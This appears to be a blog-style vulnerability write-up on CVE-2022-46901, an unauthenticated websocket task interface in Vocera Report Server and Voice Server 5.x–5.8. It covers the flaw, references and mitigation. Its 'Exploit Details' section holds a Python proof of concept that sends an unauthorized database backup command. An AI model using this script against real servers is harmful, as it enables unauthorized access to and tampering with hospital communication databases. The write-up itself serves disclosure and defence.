CVE-2022-46901 - Unauthorized Access Control to Vocera Report Server and Voice Server Database Operations

In this article, we will discuss a security vulnerability with CVE-2022-46901 that has been discovered in Vocera Report Server and Voice Server versions 5.x through 5.8. This vulnerability allows an attacker to perform unauthorized tasks and execute database operations without proper authentication. By exploiting this vulnerability, an attacker can take control of the database, perform malicious activities, and compromise the overall integrity of the system.

Description of the Vulnerability

The Vocera Report Console has a websocket interface that supports various tasks and database functions. Unfortunately, this interface does not properly enforce access controls, which could allow unauthorized users to execute critical tasks, such as backing up, loading, and clearing the database. This lack of proper access control is the core of the CVE-2022-46901 vulnerability.

Exploit Details

To understand the impact of this vulnerability, let us examine a code snippet that demonstrates the exploitation of CVE-2022-46901. In this code snippet, we will connect to the websocket interface and execute an unauthorized database backup.

import websocket
import json

target_server = 'ws://<vulnerabledomain>:80'
task_id = '1234'

# Connection to the websocket interface
ws = websocket.WebSocket()
ws.connect(target_server)

# Initiating unauthorized backup task
cmd = json.dumps({
    'Task': {
        'ID': task_id,
        'Action': 'Backup'
    }
})

ws.send(cmd)
response = ws.recv()

# Checking the response
if "STATUS_COMPLETED_SUCCESSFULLY" in response:
    print(f'Database backup task {task_id} executed successfully without authentication.')
else:
    print('Vulnerability not exploited.')

ws.close()

Successful execution of this code snippet results in an unauthorized backup of the database. This vulnerability has severe consequences, as it allows an attacker to perform tasks and database operations without authentication, posing a massive risk to the compromised environment.

Original References

It is necessary for users to be aware of the vulnerability, as well as the official references for further information and remediation steps. The following links provide details about CVE-2022-46901:

1. CVE-2022-46901 vulnerability information in the CVE database: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46901
2. Vocera Security Advisory: https://www.vocera.com/support/security-advisories

Mitigation and Remediation

To protect the integrity of the Vocera Report Server and Voice Server, organizations using versions 5.x through 5.8 should consider taking the following steps:

1. Upgrade to the latest version of the software, as it may contain patches or improvements that address the vulnerability.
2. Implement proper access control mechanisms and limited privileges for the database and its associated tasks.

Monitor the systems for any potential signs of exploitation or suspicious activity.

In conclusion, CVE-2022-46901 is a severe security vulnerability that affects Vocera Report Server and Voice Server versions 5.x through 5.8. This vulnerability allows unauthorized users to access and manipulate critical database operations, posing significant risks to the affected systems. System administrators should take immediate action to patch the vulnerability or implement the necessary security measures to protect their organizations from potential exploitation of this vulnerability.

Timeline

Published on: 07/25/2023 20:15:00 UTC
Last modified on: 08/01/2023 01:32:00 UTC